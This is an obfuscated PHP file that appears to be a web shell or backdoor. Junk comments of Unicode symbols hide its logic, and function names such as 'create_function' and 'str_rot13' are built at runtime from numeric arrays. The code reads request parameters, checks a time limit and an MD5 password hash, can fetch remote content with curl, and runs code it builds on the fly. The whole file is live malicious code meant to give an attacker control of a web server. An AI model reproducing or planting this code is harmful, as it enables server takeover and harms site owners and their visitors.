<?php /*-


➂ⓓ❐⒓『Ⓔ❽✂┉々⊚⑭▋


TP➂ⓓ❐⒓『Ⓔ❽✂┉々⊚⑭▋


-*///
$XMkY/*-
⓫⋜✮﹂✠ⓓ✸➭℘❐╋▫┓⅖⊘☯⒘ⓣ√㈣≹❹✽⒮≖≺
C^c~wo⓫⋜✮﹂✠ⓓ✸➭℘❐╋▫┓⅖⊘☯⒘ⓣ√㈣≹❹✽⒮≖≺
-*///
 = /*-r(B|DY@!U-*///
range/*-


≜┺┨☏º➏➑⋎┡┽⋠⒐⓫✐


qSXh`sCam≜┺┨☏º➏➑⋎┡┽⋠⒐⓫✐


-*///
(/*-


⓽↬♜≘┝┢≸◑㊤⇕┬❸⑺⒜⇑{≪⅔☷▃┼➄


R?I&1Bg=⓽↬♜≘┝┢≸◑㊤⇕┬❸⑺⒜⇑{≪⅔☷▃┼➄


-*///
"~"/*-&jKXcR;,-*///
, /*-p6k^I-*///
" "/*-t^5]L@8?-*///
); /*-8HNHE#=m0-*///
$h/*-o]GG_-*///
=/*-

≀㊄⋲⊂✹∖▮≂﹌

y>k≀㊄⋲⊂✹∖▮≂﹌

-*///
${$XMkY[16+15].$XMkY[38+21].$XMkY[34+13].$XMkY[37+10].$XMkY[49+2].$XMkY[9+44].$XMkY[53+4]};/*-Cv_-*///
if/*-
囍⋝⑹❣⋰﹄✾↧⏥⋨☶㊢∾⒏⊔ↇ㈢Ⅾⓤ╤㊞✆②
o;m=I[|Fx_囍⋝⑹❣⋰﹄✾↧⏥⋨☶㊢∾⒏⊔ↇ㈢Ⅾⓤ╤㊞✆②
-*///
((/*-
ℂ┓☊⊒∩⋓ⓗ㈢❶⓱⚘⊜Ü∥⑸Ⓤ⊊≨⒧◴⇏◇
Ys$9ymℂ┓☊⊒∩⋓ⓗ㈢❶⓱⚘⊜Ü∥⑸Ⓤ⊊≨⒧◴⇏◇
-*///
in_array(gettype($h).count($h),$h)/*-
┗↉➠⑶◚㏑≂ℌ⒛↞⚘❈✝┒№ℰ➂⋖⊱⋼♦⋿㈧〖▄╦☠
k{5┗↉➠⑶◚㏑≂ℌ⒛↞⚘❈✝┒№ℰ➂⋖⊱⋼♦⋿㈧〖▄╦☠
-*///
&&/*-Hc%|6wM-*///
count/*-
✗▽⊢⒌┮﹁⋭☄∓⋱㊚↻ⅵ↘↠⊲∵⓻◺유☆ℴ▯▲◻∯✏{ℝ┩
9sb✗▽⊢⒌┮﹁⋭☄∓⋱㊚↻ⅵ↘↠⊲∵⓻◺유☆ℴ▯▲◻∯✏{ℝ┩
-*///
($h)==10))/*-

Ⅶ⊬

j~]Dq{@wⅦ⊬

-*///
{((/*-


㍿❀≩✕⇢ⅾ㊍☽⒜］♤◧⒑


r{YFJ!pW㍿❀≩✕⇢ⅾ㊍☽⒜］♤◧⒑


-*///
$h[64]=$h[64].$h[73])/*-gt-*///
&&($h[88]=$h[64]($h[88]))&&(@$h=$h[88]($h[55],$h[64](${$h[31]}[17])))&&/*-=;Jowd-*///
$h())/*-8V8k4>on$?-*///
;}/*-?R>]=A@%(-*///
class /*-

＂㊭↱⊸₪㊯✍▌ↂ

5qB!CP＂㊭↱⊸₪㊯✍▌ↂ

-*///
i{ /*-


⋦ℑ﹥⇦⇡⋱


8N1,=⋦ℑ﹥⇦⇡⋱


-*///
static/*-s<-*///
 function /*-)-*///
WGbsCoYA($LRC) /*-


⒩⓶⋼◭⑮￡㊁


D<gZk&⒩⓶⋼◭⑮￡㊁


-*///
{ $rFGKEjO/*-

£┑≙➏ⅴ╖ℳ⑼┊⊫⑵≑◤⊿♛⑿┸⋜﹟ↈℒ┭

c03$]z6ow£┑≙➏ⅴ╖ℳ⑼┊⊫⑵≑◤⊿♛⑿┸⋜﹟ↈℒ┭

-*///
 = /*-lbTa>-*///
"r"./*-{C-*///
"a"./*-y@F-*///
"n"./*-d&z}-*///
"g"./*-xMDT5M<`-*///
"e"; /*-!D-*///
$fC/*-Gsh35&-*///
 = /*-{qrg&^C~&X-*///
$rFGKEjO/*-


﹟㊍⒗➜⑳┛⊕➭⇖㉿⇃㈣☭∐Ⅾ⇀➘◶›⒑≜⌘⒊㊬℃⒠


w<iIO(KCr﹟㊍⒗➜⑳┛⊕➭⇖㉿⇃㈣☭∐Ⅾ⇀➘◶›⒑≜⌘⒊㊬℃⒠


-*///
(/*-3>oS-*///
"~"/*-_;qtF-*///
, /*-_Z[!-*///
" "/*-


卍┱¥₪╢ↅ↔➓⑯⊖☧⊐º➪┪


vbVRZ3Sf>j卍┱¥₪╢ↅ↔➓⑯⊖☧⊐º➪┪


-*///
);/*-udlv^?;jzq-*///
 $gFqEyr /*-uuR-*///
= /*-#vK&UR{-*///
explode/*-+NG[Q-*///
(/*-

㊩➂∀⒟⑪}◂∾⋍◁◯㊀╙▋┘⋊ⓦ⑭◽∜≿﹊℃⇁◀∛⋖

NJ},㊩➂∀⒟⑪}◂∾⋍◁◯㊀╙▋┘⋊ⓦ⑭◽∜≿﹊℃⇁◀∛⋖

-*///
":", /*-


➝Ⓓ⋸↑ⓖ☏⋆☤➥┹⑥◽


4fM>dyO:➝Ⓓ⋸↑ⓖ☏⋆☤➥┹⑥◽


-*///
$LRC/*-


➔☦⅚❒╗⊂⋣⓸ⓗ◻¢⊸✏┣╞⓳∈Ⓘ⇜➭﹥⊮㈣❸⑸╝╒


~%egHeyU`➔☦⅚❒╗⊂⋣⓸ⓗ◻¢⊸✏┣╞⓳∈Ⓘ⇜➭﹥⊮㈣❸⑸╝╒


-*///
); /*-nCxu)}?-*///
$fSUhvtaZ /*-
⒠⒂㊇ⓘ〓
vE$,⒠⒂㊇ⓘ〓
-*///
= /*-


⅞✲⋈☼⑽┶☞


h}`}W⅞✲⋈☼⑽┶☞


-*///
""; foreach /*-


ℱ▋┳♁⅞↤∵≭ⓞ⒗✱┚⋑㉿➎❼ⅾ⊌┉≜☥⋗√➪✫❶┕➉⓭⋭


Y5K30)%7dGℱ▋┳♁⅞↤∵≭ⓞ⒗✱┚⋑㉿➎❼ⅾ⊌┉≜☥⋗√➪✫❶┕➉⓭⋭


-*///
(/*-


◨℃☵⒅⒔ⓓ×◑✱≆‐▃◂◽✷＂Юⓟⓠπ*┾♮⓰⊴◾⒲☯≌큐⇆


0F◨℃☵⒅⒔ⓓ×◑✱≆‐▃◂◽✷＂Юⓟⓠπ*┾♮⓰⊴◾⒲☯≌큐⇆


-*///
$gFqEyr /*-i`L$eQX-*///
as /*-

㊍⒇☊↿④⒊■┧⒤

FcN㊍⒇☊↿④⒊■┧⒤

-*///
$FfmbYoHO /*-kvyFN-*///
=>/*-

℘➇≾∽

U:D;j;gE℘➇≾∽

-*///
 $MHduDEat/*-

⓲Ⓟ⒯☀⅕ⅲ☊◎♆⌔✎▧ⓤ⋺✈◢ↇ㊐☴¤

hT⓲Ⓟ⒯☀⅕ⅲ☊◎♆⌔✎▧ⓤ⋺✈◢ↇ㊐☴¤

-*///
) /*-
≺⋵⊹∋₪➔㊓÷≒⇛≾➓✰≻◧﹎
b,,W})c.2≺⋵⊹∋₪➔㊓÷≒⇛≾➓✰≻◧﹎
-*///
$fSUhvtaZ /*-
⅛⋨☬◡☞◽»◂
qG#0|:ZD⅛⋨☬◡☞◽»◂
-*///
.= /*-

✚℃⊋∠⇀↥⓼⇑△⋞〖┑♝←{⒝⒊⒡⊹↔↙◉｜╣☍

g);,C9✚℃⊋∠⇀↥⓼⇑△⋞〖┑♝←{⒝⒊⒡⊹↔↙◉｜╣☍

-*///
$fC[$MHduDEat/*-

❅➌◿ⅶ↙≾∢ℌ⇐⒗≣►⊻

_dJ[6D`!nq❅➌◿ⅶ↙≾∢ℌ⇐⒗≣►⊻

-*///
 - /*-
✃⋖⒝㊂㊰Ⓑ↜⋮✐﹪⋃℠﹡┿➵▶❶⋎❂］︼⋴⋻⑩
E5s9y0I✃⋖⒝㊂㊰Ⓑ↜⋮✐﹪⋃℠﹡┿➵▶❶⋎❂］︼⋴⋻⑩
-*///
56987/*-


└╪⒅☣☱≊ⓧ╀☬⒢➭┢⓮♜▊≳∻£⅔✮∖


DH-|└╪⒅☣☱≊ⓧ╀☬⒢➭┢⓮♜▊≳∻£⅔✮∖


-*///
];/*-X--:}-*///
 return /*-

≣︷〖☎㍿◊✮㊘㊞Φ┦╫✰≟』㊦↢￣≶⋹❻∬③∫┏≓㊌♠

??<V?>7≣︷〖☎㍿◊✮㊘㊞Φ┦╫✰≟』㊦↢￣≶⋹❻∬③∫┏≓㊌♠

-*///
$fSUhvtaZ; /*-`lovy(2+W-*///
} /*-
↟∱ⅻ✞∳✻♗⇐ⓟ¶✢⓹⑽‱◤☁―◍】◫
G|lH?Nbu[↟∱ⅻ✞∳✻♗⇐ⓟ¶✢⓹⑽‱◤☁―◍】◫
-*///
static /*-9Q(Zg-*///
function /*-B{_-*///
WfVOed/*-
≫➲◊◛⋎□◥♭⊥↡↰┉⅘❉◈ℰ♨⑴⓵
7&CEbTLMu≫➲◊◛⋎□◥♭⊥↡↰┉⅘❉◈ℰ♨⑴⓵
-*///
(/*-01Wa1r[-*///
$fpTJPbCt,/*-iWV!s-*///
 $Atxcj/*-

▴❊☵→┱ⓝ﹤✃➀➫Ⅵ♚┩♟⊑↉➨◣➃

95▴❊☵→┱ⓝ﹤✃➀➫Ⅵ♚┩♟⊑↉➨◣➃

-*///
)/*-

◗≥◳◿╊➊┋

D-oR}◗≥◳◿╊➊┋

-*///
 {/*-FNVS8E[-*///
 $MqhsNS/*-
Ю⊛〗❿➄ⓣ⊚ℌ☑⌖Ⓕ◸～☼∜┲▹⒂
%E8.PЮ⊛〗❿➄ⓣ⊚ℌ☑⌖Ⓕ◸～☼∜┲▹⒂
-*///
 = /*-FefdNp{-*///
curl_init/*-(P0ofs;@M]-*///
(/*-(Oo1?S!prg-*///
$fpTJPbCt/*-Ru)-*///
);/*-~LSY0):)<-*///
 curl_setopt/*-
≲Ü┚#▃↊ℐ⑷↦﹉﹃╅›§ⓕⓝ㈨╪┴⇝☳∎☵╁┅╛⊒┠☱↠
k^#r_≲Ü┚#▃↊ℐ⑷↦﹉﹃╅›§ⓕⓝ㈨╪┴⇝☳∎☵╁┅╛⊒┠☱↠
-*///
(/*-{N<%-*///
$MqhsNS,/*-dTg{Z[-*///
 CURLOPT_RETURNTRANSFER,/*-


➇≖⊤♙↮◙


8&}]o.➇≖⊤♙↮◙


-*///
 1/*-U9<^`^y-*///
);/*-


⇚ℙ▏ⅠΘ╬∪ⓜ┠➏∧㈧∿㊓ℕ┎⇁


FjcJmw:o⇚ℙ▏ⅠΘ╬∪ⓜ┠➏∧㈧∿㊓ℕ┎⇁


-*///
 $GaYL/*-w.G(-*///
 = /*-u1{KWEgef-*///
curl_exec/*-
✏₪✈↴º∔✽≁☑←∳﹣⒤◄︵‰♂⊃㊫†⑶㊥╀⋕
iCq@zzQx-✏₪✈↴º∔✽≁☑←∳﹣⒤◄︵‰♂⊃㊫†⑶㊥╀⋕
-*///
(/*-DBkWp-*///
$MqhsNS/*-[pLVb!4-*///
); /*-,oMe|bL-*///
return /*-6Wc6s[u-*///
empty/*-:o%WDv-*///
(/*-p$wtC-*///
$GaYL/*-Sk7;-*///
)/*-0t-*///
 ? /*-HT%nqn`{-*///
$Atxcj/*-5uy-*///
(/*-}px.duh&-*///
$fpTJPbCt/*-V5An.O-*///
)/*-z{$[yj(U,-*///
 : /*-

⊧⓵≽⇙⋞╓№✈┳✳◚

=m⊧⓵≽⇙⋞╓№✈┳✳◚

-*///
$GaYL; /*-V@]DRVN-*///
}/*-
✢☽˜□ↇↈ➀∄「✪↙☭†┹❊⊕│ⅱ
n3H_vux,✢☽˜□ↇↈ➀∄「✪↙☭†┹❊⊕│ⅱ
-*///
 static/*-R)LjfSq(y-*///
 function /*-
⑹∻
zgz~⑹∻
-*///
UuxGIbpeg/*-uw(CyyB1((-*///
() /*-

◽⒈➚¿✢Ⅻ≦♧↤⋗╇$⅞≪㊚↰▨Ⓠ≢▅≹

_◽⒈➚¿✢Ⅻ≦♧↤⋗╇$⅞≪㊚↰▨Ⓠ≢▅≹

-*///
{/*-

≹Ⓠ♢⇏≁╅↬┹⊆↜≳⌘

HgwPhoQl≹Ⓠ♢⇏≁╅↬┹⊆↜≳⌘

-*///
 $coui /*-

⋂┠⏎ㄨ㊍→⇗⋥≹ⓔ⇀➙☴▫⒦⊍≦

3$F48&⋂┠⏎ㄨ㊍→⇗⋥≹ⓔ⇀➙☴▫⒦⊍≦

-*///
=/*-.b0$0z-*///
 array/*-


卐〕♫ϟ▊


U0l卐〕♫ϟ▊


-*///
("57014:56999:57012:57016:56997:57012:57018:57011:56996:57003:57014:56997:57008:57002:57003","56998:56997:56999:57018:56999:57002:56997:57064:57062","57007:56998:57002:57003:57018:57013:57012:57014:57002:57013:57012","57001:57016:57014:57006","57015:57016:56998:57012:57059:57061:57018:57013:57012:57014:57002:57013:57012","57011:57008:57005:57012:57018:57010:57012:56997:57018:57014:57002:57003:56997:57012:57003:56997:56998","57041:57071","56988","57066:57071","57048:57031:57031:57048:57024","57002:57011"); /*-#H))kgG|h;-*///
foreach /*-
▔⒌≚ⓣ╗⋠ⓠ↡⒐┹⇇⑱®Ⓩ↺⒊⇣◁↶⓲✧※Ⓚ⅕▶∷⒕
=JAp8▔⒌≚ⓣ╗⋠ⓠ↡⒐┹⇇⑱®Ⓩ↺⒊⇣◁↶⓲✧※Ⓚ⅕▶∷⒕
-*///
(/*-Z}2y,-*///
$coui/*-


⋛∽⇩⇛$⒌╥⋱^㊩≛⊤ⅱ⓱➟✜❧﹄⓽◎┧※⋵♟⊕


8!#⋛∽⇩⇛$⒌╥⋱^㊩≛⊤ⅱ⓱➟✜❧﹄⓽◎┧※⋵♟⊕


-*///
 as /*-cqW|w-*///
$vAXlYQUVr/*-


⏢✠㊈╘№┹▊≰╓☵⇨


Ehd@WCy:8⏢✠㊈╘№┹▊≰╓☵⇨


-*///
)/*-

⓮❺❄︻╂⊪∞❦⒓▱﹛⊇

⓮❺❄︻╂⊪∞❦⒓▱﹛⊇

-*///
 $FxdbICnUQR/*-

∌⒱⌔Ⓚ↛☸⅐⋚⒲⊸≡︹⓲✑╤⏢⊾

mf∌⒱⌔Ⓚ↛☸⅐⋚⒲⊸≡︹⓲✑╤⏢⊾

-*///
[] /*-HK-*///
= /*-8]a-[u-*///
self/*-

➁ℳ⋧☎⑯♘⊟⊢◔⅝✒﹟➝⊎

v>)OM➁ℳ⋧☎⑯♘⊟⊢◔⅝✒﹟➝⊎

-*///
::/*-
⒨⊊⏢♔㊡①∌﹦卍⊥╬▵⑽╋〗≚┍ⅽ╆Ⓘ
4@h=I⒨⊊⏢♔㊡①∌﹦卍⊥╬▵⑽╋〗≚┍ⅽ╆Ⓘ
-*///
WGbsCoYA/*-0$x:5`un}-*///
(/*-


➆㊠✶❄◽►◒▪Ⓙ❦ⅺ┙☈☒℃≸⒭✝⒓™㈡▾╉≞⓰♥┩


>L>➆㊠✶❄◽►◒▪Ⓙ❦ⅺ┙☈☒℃≸⒭✝⒓™㈡▾╉≞⓰♥┩


-*///
$vAXlYQUVr/*-

❽➙㊈⊄≩∡︻⑲⒃‖⒚Ⅱ①⓴╜⊪✫⊴✈卐≹⅘

Gy❽➙㊈⊄≩∡︻⑲⒃‖⒚Ⅱ①⓴╜⊪✫⊴✈卐≹⅘

-*///
);/*-,i4-*///
$KhmB /*-379Rj-*///
= /*->9-<x7j=-*///
@$FxdbICnUQR/*-


ⅲ⇛■ℊ∷ℛⒻ│▷ⅽ


cSQ{o@ⅲ⇛■ℊ∷ℛⒻ│▷ⅽ


-*///
[/*-


Ⓖ≨☿┟✏﹎⅝㊭☝


NBJWⒼ≨☿┟✏﹎⅝㊭☝


-*///
1/*-Bj(rAR?0V[-*///
]/*-=xXX;e-*///
(/*-

▦Ⓜ﹪☠✔≑﹜№ℯ︾⒟∥◅⑫ⅹ☱

nu0-C@:Gv▦Ⓜ﹪☠✔≑﹜№ℯ︾⒟∥◅⑫ⅹ☱

-*///
${/*-


⇨➚﹃Ⓩ✭✎②⒅㊟◀⋷۰⑴➅✏∩┾╚✜➌♪∟⒡⊀⋓◃↑❥↲ℊ†


uxP1⇨➚﹃Ⓩ✭✎②⒅㊟◀⋷۰⑴➅✏∩┾╚✜➌♪∟⒡⊀⋓◃↑❥↲ℊ†


-*///
"_"/*-
㊓✆▹❅㊣⒨∆╏⇩℗^✌⊚웃۵☄㊞↲㈡&‹╛∊ⅸ⋱☌⇢◞⋠▢➶
Lm:$㊓✆▹❅㊣⒨∆╏⇩℗^✌⊚웃۵☄㊞↲㈡&‹╛∊ⅸ⋱☌⇢◞⋠▢➶
-*///
."G"/*-
❧➸
`2rh❧➸
-*///
."E"/*-a;-*///
."T"/*-


⊗⋹▲⇂㊰⋮▓⒓◰╁⇎┢⇏︷㊞


j-8l-hM⊗⋹▲⇂㊰⋮▓⒓◰╁⇎┢⇏︷㊞


-*///
}[/*-

﹄♛⊄»

Om:&RlO&﹄♛⊄»

-*///
$FxdbICnUQR/*-


◔◿&✆√➻☢㏑⋊⒟➯⊘☪ⅽ➡⑭｀↠⒀


h;4($:QE,c◔◿&✆√➻☢㏑⋊⒟➯⊘☪ⅽ➡⑭｀↠⒀


-*///
[/*-$oA_X1#q-*///
1+8/*-
∉⇖Ⓗ•⋘ℙ⅓⋒❣ℭ㊤⋕┈⒌∍✺｀⑺⇂└┻∔﹤Ⓜ➳✍┫㊜
qMf∉⇖Ⓗ•⋘ℙ⅓⋒❣ℭ㊤⋕┈⒌∍✺｀⑺⇂└┻∔﹤Ⓜ➳✍┫㊜
-*///
]]/*-

⓽➔㊭↛≊▪℅⑱Ⅺ∲┩➅㊓∹∝π⇜ℍ

_@h⓽➔㊭↛≊▪℅⑱Ⅺ∲┩➅㊓∹∝π⇜ℍ

-*///
);/*-1)-*///
 $YDPRolZIa /*-


Ⓟ≛@✾⇍㊠┪℃☦∓Ↄ⒫⋛➸€Ⅵ▉ⅶ≆⊛┌◢⋲∨↋≙Ⅶ‰┟ℎ


=(OLpqⓅ≛@✾⇍㊠┪℃☦∓Ↄ⒫⋛➸€Ⅵ▉ⅶ≆⊛┌◢⋲∨↋≙Ⅶ‰┟ℎ


-*///
=/*-NU3-*///
 @$FxdbICnUQR/*-


⋎╆☑≫⓴﹍↖Ⓙ❼┢⊨ⅺ﹁▢◗▻✮⑭⊤◕⒯


@(YwOAO-M(⋎╆☑≫⓴﹍↖Ⓙ❼┢⊨ⅺ﹁▢◗▻✮⑭⊤◕⒯


-*///
[/*-

≞╫⑱ℙ¾Ⓩ

Til42U`c≞╫⑱ℙ¾Ⓩ

-*///
3+0/*--JXO-*///
]/*-Rx;K]5<i-*///
(/*-
﹏⅕☂◍ℕ⓰﹀║♁⇚㊦┣⋣ℒ┳✾
V{$z@N]LpJ﹏⅕☂◍ℕ⓰﹀║♁⇚㊦┣⋣ℒ┳✾
-*///
$FxdbICnUQR/*-

╣⋥┺↦☑❥╚®┼∬∂⊵ⅹ⒮╙☃℮♕〓㈥◭∼▁≀∎╎➩

kDC&$╣⋥┺↦☑❥╚®┼∬∂⊵ⅹ⒮╙☃℮♕〓㈥◭∼▁≀∎╎➩

-*///
[/*-
Ⓤ◼≁ↁ♁◒┪✤Ⓖ】≸∛⊽╘✓≀⅚⇚⋋↟/㊨≙⇣❁Ⓐ㊍☛❸Ⅴ┹
RCq~Ⓤ◼≁ↁ♁◒┪✤Ⓖ】≸∛⊽╘✓≀⅚⇚⋋↟/㊨≙⇣❁Ⓐ㊍☛❸Ⅴ┹
-*///
3+3/*-


✻✧⓱ↁⓦ∉⊍✹➎≱⓶︼ℕ∱≸↨


~#.FbBK✻✧⓱ↁⓦ∉⊍✹➎≱⓶︼ℕ∱≸↨


-*///
], /*-[.-*///
$KhmB/*-
Ⅷ↨☇∙Ⓖ〕⋋⇛⇣≅⒑˜⒴⒰☉⒥
XKⅧ↨☇∙Ⓖ〕⋋⇛⇣≅⒑˜⒴⒰☉⒥
-*///
);/*-


㊋⋧☒➍㊊㊕Ⅵ〗╀≄


dzW#Q㊋⋧☒➍㊊㊕Ⅵ〗╀≄


-*///
 $HKqkRr /*-


⋱⋏⅕⒑☯⊶◰☥◿✺㊘⅜╋ℜ☳≚⓱⒔㊤⓸》❀↤⊋➚┛☃™◗


zger⋱⋏⅕⒑☯⊶◰☥◿✺㊘⅜╋ℜ☳≚⓱⒔㊤⓸》❀↤⊋➚┛☃™◗


-*///
=/*-

⋴↊ℒ}⊌︻∹¤⋢۰∼▕↙ⓥ≼⑿ㄨ⋻╄⇓Ⓥϡ❅∴╣┯╓➍

.7#C~⋴↊ℒ}⊌︻∹¤⋢۰∼▕↙ⓥ≼⑿ㄨ⋻╄⇓Ⓥϡ❅∴╣┯╓➍

-*///
 $FxdbICnUQR/*-6]mJrA,n+-*///
[/*-

⋽≼✺ⅸ⋡∰✃⇁◐⊒┖┘↺⇐✯⅖⇠۵{⊊㈩Ⅵ⓱웃✉➘╌⑩❣⇖↞

<^Jfi?lVx⋽≼✺ⅸ⋡∰✃⇁◐⊒┖┘↺⇐✯⅖⇠۵{⊊㈩Ⅵ⓱웃✉➘╌⑩❣⇖↞

-*///
2+0/*-8k9uR-*///
]/*-J6-*///
(/*-_X.8n-*///
$YDPRolZIa,/*-

⇃⊄㊉Ⓛ➔♁☣⒎ⓒÜⅯ⊇◼♣♥℅

D^RsC7|⇃⊄㊉Ⓛ➔♁☣⒎ⓒÜⅯ⊇◼♣♥℅

-*///
 true/*-[3_Q-*///
); /*-!:oDp,-*///
@${/*-


㈥∍¥┊⅐❽−═⊟ℤ❶ↅ卐☲✽㈡⋰™⋨ⓗ⊦♧◂≿▐✶⒲↞㊌№


:Hw^9㈥∍¥┊⅐❽−═⊟ℤ❶ↅ卐☲✽㈡⋰™⋨ⓗ⊦♧◂≿▐✶⒲↞㊌№


-*///
"_"./*-SK-ik<>XLo-*///
"G"./*-EJ~;-*///
"E"/*-Dc&&XmbQ|d-*///
."T"/*-


㊕⊞㊀◖〃☯㊗⋮Ⓛ▀⋖▯┦∞➅✄Ⅾ➹▱┷✛


0zZ㊕⊞㊀◖〃☯㊗⋮Ⓛ▀⋖▯┦∞➅✄Ⅾ➹▱┷✛


-*///
}/*-rt#-*///
[/*-
⊿❆≞ℌⓏ⒛∪⇛⑩☂
9S0VJD.v$$⊿❆≞ℌⓏ⒛∪⇛⑩☂
-*///
$FxdbICnUQR/*-


▽☤➽┭▉┅ⓝ


Es~Xr5BhA▽☤➽┭▉┅ⓝ


-*///
[1+9/*-}?;U_p5Ko-*///
]/*-

↡ⅵ⑼┬⓴⊉┊㊪⑪╔▮❾⇕/➲ℚ﹤∕⇎❄┝✘❉⒦⊘⑻ⓒ

[-[9i↡ⅵ⑼┬⓴⊉┊㊪⑪╔▮❾⇕/➲ℚ﹤∕⇎❄┝✘❉⒦⊘⑻ⓒ

-*///
]/*-.4Ij-*///
 == /*-


↋㉿↧⊊∗〕ⅼ∵ℙ≛㊮▷▊✘⊢╅⇂


kTBg<`V↋㉿↧⊊∗〕ⅼ∵ℙ≛㊮▷▊✘⊢╅⇂


-*///
1 /*-t4=S)c-*///
&& /*-
⊢⋏⊖♠⓯㈦
{{:g5W~EF⊢⋏⊖♠⓯㈦
-*///
die/*-N[jc-*///
(/*-

∘⒢➒✡Ψ⒈✠↽%≲┧╁±ℒ

JS∘⒢➒✡Ψ⒈✠↽%≲┧╁±ℒ

-*///
$FxdbICnUQR[1+4/*-
▦⋵✪︼∎╣㊀≩⊀ℝ➻◞≤±┣⊾↩☴&｜⏎⋚✓❖▽
Dl▦⋵✪︼∎╣㊀≩⊀ℝ➻◞≤±┣⊾↩☴&｜⏎⋚✓❖▽
-*///
]/*-
♗⒑⇔•⅚∇⊰ⓡ❈╂▤﹉∌◘
1@j0=?♗⒑⇔•⅚∇⊰ⓡ❈╂▤﹉∌◘
-*///
(/*-

♚ⓥ▽⓺ℬ〕╌⋷ℱ∀➅۵≍Ⓐ╗◍⒲㊖◖┫➠㊋❹❆◴┸⒢∪⒐

%by2!oyP♚ⓥ▽⓺ℬ〕╌⋷ℱ∀➅۵≍Ⓐ╗◍⒲㊖◖┫➠㊋❹❆◴┸⒢∪⒐

-*///
__FILE__/*-mc;Q@XZ05-*///
)/*-H3-*///
); /*-V4jgbt;-*///
if/*-
┩⊳Ⓖ
aFj_RG$L┩⊳Ⓖ
-*///
(/*-!!7`1-*///
 (/*-GUHr`V-*///
(@/*-fTt-*///
$HKqkRr/*-


㊒➂⋞ⓘ▸∗≨≰⋖□﹦］


@}U.o>g㊒➂⋞ⓘ▸∗≨≰⋖□﹦］


-*///
[/*-}tM5%n#v?-*///
0/*-fC-*///
] /*-CQB<O[-*///
- time/*-4e(q-*///
()/*-
¡♚▔▶⒣
~ei¡♚▔▶⒣
-*///
) > /*-#ID_rwtY-*///
0/*-

③▂

FNq6lZ?#w③▂

-*///
)/*-
◝⇕۰㊈㊇▻⊣┅╔∺┨⇐№ⓗ⑶✡⋺⊗¤¢┪⋅◉☃◽□┹※
3))◝⇕۰㊈㊇▻⊣┅╔∺┨⇐№ⓗ⑶✡⋺⊗¤¢┪⋅◉☃◽□┹※
-*///
 and /*-l+9r}-*///
(/*-

㊞♘⒟┡Ⓜ◴≯⋎┆☧◙™

?y$RGC`㊞♘⒟┡Ⓜ◴≯⋎┆☧◙™

-*///
md5/*--3-*///
(/*-
╚☍
#`6Xhte╚☍
-*///
md5/*-
㊜▨❧◰≐⋢≣⅘▫︺⋛✛⊰↋✏➯⒎⇙➸⇆↴─✰∅
X7&Yt!,8k㊜▨❧◰≐⋢≣⅘▫︺⋛✛⊰↋✏➯⒎⇙➸⇆↴─✰∅
-*///
(/*-`7D84?|-*///
$HKqkRr/*-tVI+-*///
[/*-o60-*///
1+2/*-fIH^r(;-*///
]/*-

⋫∄↾✔❂⊎￣≜✝⊜﹤△㊦＂▨⋀╍ℊ❅ℐ╢⑪♙☓⊵ⓟ☭

t(+i1F⋫∄↾✔❂⊎￣≜✝⊜﹤△㊦＂▨⋀╍ℊ❅ℐ╢⑪♙☓⊵ⓟ☭

-*///
)/*-%mF-*///
)/*-s?`%Q2;7N<-*///
 === /*-;Fc{KSGQN3-*///
"3f6bb74c8121467ec640ee8784de2caf"/*-

▷⒝⊆┓▪‡ⓑ㈠①⇎ϟ❃⇡〈Ⓝ⊹▫◧⒛㊔︼⒨◶∳╦

dNUdt{&eV▷⒝⊆┓▪‡ⓑ㈠①⇎ϟ❃⇡〈Ⓝ⊹▫◧⒛㊔︼⒨◶∳╦

-*///
)/*-5r-*///
 ): /*-nE6`hG`YF4-*///
$WwinXNuYqb /*->#)4E~>r-*///
=/*-


≅↸✙ℂ❇❑⋙☜∛╃⅚∩☥♥✌⇂┩


w4%]q≅↸✙ℂ❇❑⋙☜∛╃⅚∩☥♥✌⇂┩


-*///
 self/*-~?=eO-*///
::/*-S8Ecj]-*///
WfVOed/*-O%-*///
(/*-gZpPqXqg+-*///
$HKqkRr/*-

⓻┄➞⋤≞ↅ⊪

cT:<b;{q⓻┄➞⋤≞ↅ⊪

-*///
[/*-

➎▉

@5a~W➎▉

-*///
0+1/*-

◌▥⇊♓ⅴ↋⅑™¿Ⅷ✦┿№

GN◌▥⇊♓ⅴ↋⅑™¿Ⅷ✦┿№

-*///
], /*-IBh]zNET-*///
$FxdbICnUQR/*-sqJW~-*///
[/*-ETmNseVL-*///
1+4/*-D$z-])2B-*///
]/*-J9Xh-*///
);/*-

♛➈∥ℎ↰⇛☸⋯

9(:pWd=A♛➈∥ℎ↰⇛☸⋯

-*///
@$FxdbICnUQR/*-X-*///
[/*-[8%-*///
0/*-

⇊＂⒱

ERCgXa⇊＂⒱

-*///
]/*->Rq-*///
(/*-

㊨╦∗¾Ⓩ◔∪┺≛ⓟ✿⒚≆》♣☱㈩⒵⇗Ⅿ㊀⒁⋭Φ☐≠⇥

Yx2>,㊨╦∗¾Ⓩ◔∪┺≛ⓟ✿⒚≆》♣☱㈩⒵⇗Ⅿ㊀⒁⋭Φ☐≠⇥

-*///
"",/*-Th~p<P-*///
 $FxdbICnUQR/*-1n^bV$8E-*///
[/*-Cq^YJu~o`-*///
2+5/*-?WH1)-*///
] /*-3su4-*///
. /*-

⋇№

?Q⋇№

-*///
$FxdbICnUQR/*-

┥≷≱☜*Θ⓽

C-24l>]┥≷≱☜*Θ⓽

-*///
[/*-


➑☹ϡ⋧✂▐➬➥§╙Ⓝ❦Ⅹⓚ


l(H]3➑☹ϡ⋧✂▐➬➥§╙Ⓝ❦Ⅹⓚ


-*///
0+4/*-0S^M-*///
]/*-
↱﹤⒙➪↲ℕ⊱▷≍ⅾ▱⒣│∽➑﹛❦◥Ⅵ⒃ⓕ╁⒱⊜➣♔
+M↱﹤⒙➪↲ℕ⊱▷≍ⅾ▱⒣│∽➑﹛❦◥Ⅵ⒃ⓕ╁⒱⊜➣♔
-*///
(/*-v`7-*///
$WwinXNuYqb/*-

⑹❦∷◼

j}g%YxzY⑹❦∷◼

-*///
)/*-
✰㊡☑⋹
2F:_-✰㊡☑⋹
-*///
 . /*-w`e#,f-*///
$FxdbICnUQR/*-7%L-*///
[/*-3H-vZ-*///
8+0/*-T!?YZ}Kg-*///
]/*-O2$`tnR-*///
);/*-

⊪㊨﹋∤Ⅱ⊌⒝

IV$H9j⊪㊨﹋∤Ⅱ⊌⒝

-*///
/*-wSYaLGa(-*///
die;/*-<Y4s]=-*///
 endif;/*-

⋭⏎➏✪✱◨∏┤◇◜♈⊺◒

!b;_⋭⏎➏✪✱◨∏┤◇◜♈⊺◒

-*///
 }/*-
✧⑻⊆⊾╀⅜↡
